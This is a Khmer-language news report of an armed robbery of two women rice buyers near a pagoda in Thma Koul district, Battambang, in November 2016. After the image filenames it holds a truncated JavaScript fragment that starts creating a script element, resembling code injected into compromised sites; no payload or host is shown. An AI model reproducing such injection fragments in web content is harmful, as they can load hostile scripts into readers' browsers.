Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ប្រាក់បាតជាង១០មុឺនបាត និងប្រាក់រៀលរាប់លាន ត្រូវក្រុមចោរប្លន់យកគ្មានសល់នៅស្រុកថ្មគោល

បាត់ដំបង ៖ មនុស្ស២នាក់ជាជនរងគ្រោះដើរទិញស្រូវពីអ្នកស្រុក ត្រូវបានក្រុមចោរបាញ់គំរាម ហើយប្លន់យក លុយអស់យ៉ាងសន្ធឹកសន្ធាប់ កាលពីវេលាម៉ោង៨និង ៣០នាទីយប់ថ្ងៃទី២៧ ខែវិច្ឆិកា ឆ្នាំ២០១៦ នៅចំពីមុខក្លោងទ្វារវត្តពពាលខែស្ថិតនៅភូមិក្រួស ឃុំជ្រៃ ស្រុកថ្មគោល ខេត្តបាតដំបង គ្រាដែលជនរងគ្រោះទាំងពីរនាក់ កំពុងអង្គុយទូទាត់លុយថ្លៃទិញស្រូវពីប្រជាពលរដ្ឋ។
ជនរងគ្រោះមានឈ្មោះអ៊ុក អឿ ភេទស្រី  អាយុ៥១ឆ្នាំ  រស់នៅភូមិថ្មី ឃុំបន្សាយត្រែង  ស្រុកថ្មគោល ខេត្តបាតដំបង  ទ្រព្យសម្បត្តិដែលបាត់បង់រួមមានក្របូបស្ពាយ ពណ៌ក្រម៉ៅចំនួន១ ប្រាក់បាតចំនួន៥០០០០បាត ប្រាក់រៀលចំនួន១លានរៀល ចំណែកជនរងគ្រោះម្នាក់ទៀតមានឈ្មោះមួង សុីណាត ភេស្រី អាយុ៤១ឆ្នាំ រស់នៅភូមិ   ព្រៃទទឹង ឃុំជ្រៃ ស្រុកថ្មគោល  ទ្រព្យសម្បត្តិដែលបាត់បង់រួមមាន ប្រាក់បាត អស់ចំនួន៧៥០០០បាត ប្រាក់រៀល អស់ចំនួន៥០មុឺនរៀល ទូរសព្ទ័ដៃមួយគ្រឿង។

 

 

ប្រភពពីក្រុមកម្មករលីបាវស្រូវបានបញ្ជាក់ប្រាប់សមត្ថកិច្ចថា ពេលកើតហេតុនោះពួកគេបានលីបាវស្រូវឡើង លើឡានរួចរាល់ ហើយទាំងថៅកែ និងពួកគេ បានឈប់សំរាកនិងអង្គុយជែកលែងជាធម្មតា ដោយនៅពេលនោះដែរ ស្ត្រីរងគ្រោះទាំងពីរនាក់ដែលជាដង្ខៅទិញស្រូវកំពុងអង្គុយរាប់លុយដើម្បីទូទាត់លុយអោយម្ចាស់ស្រូវ ស្រាប់ តែមានជនមិនស្គាល់មុខ៣នាក់ ពាក់អាវប៉ារ៉ាក្រឡាធំ ពណ៌ខៀវពាក់មួកក្រតិប មានរិម  ប្រដាប់ដោយកាំភ្លើងម៉ាកអាកាបត់ចំនួន២ដើម  និងកាំបិតបុ័ងតោចំនួន១ បានធ្វើសកម្មភាពបាញ់ភ្ជុចដីមួយគ្រាប់  ដើម្បីបំបាក់ស្មារតី  ព្រមទាំងបានភ្ជង់ទៅលើកម្មករទាំងអស់មិនអោយតបតឡើង  ហើយបានឆក់យកកាបូបរបស់ជនរងគ្រោះទាំងពីរនាក់ ដោយមុននឹងចាកចេញពួកគេបានបាញ់ទៅលើដីបន្ថែមចំនួន២គ្រាប់ថែមទៀតរួចក៏បានគេចខ្លួនទៅទិសខាងលិចបាត់ស្រមោល។
សូមបញ្ជាក់ថានៅក្នុងហេតុការណ៌នេះមិនមាននរណាម្នាក់រងរបួស ដោយក្រុមចោរគ្រាន់តែធ្វើការបាញ់គម្រាមសំឡុតទៅលើដីតែប៉ុណ្ណោះ៕

img-20161128-wa0077img-20161128-wa0079img-20161128-wa0080img-20161128-wa0083var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More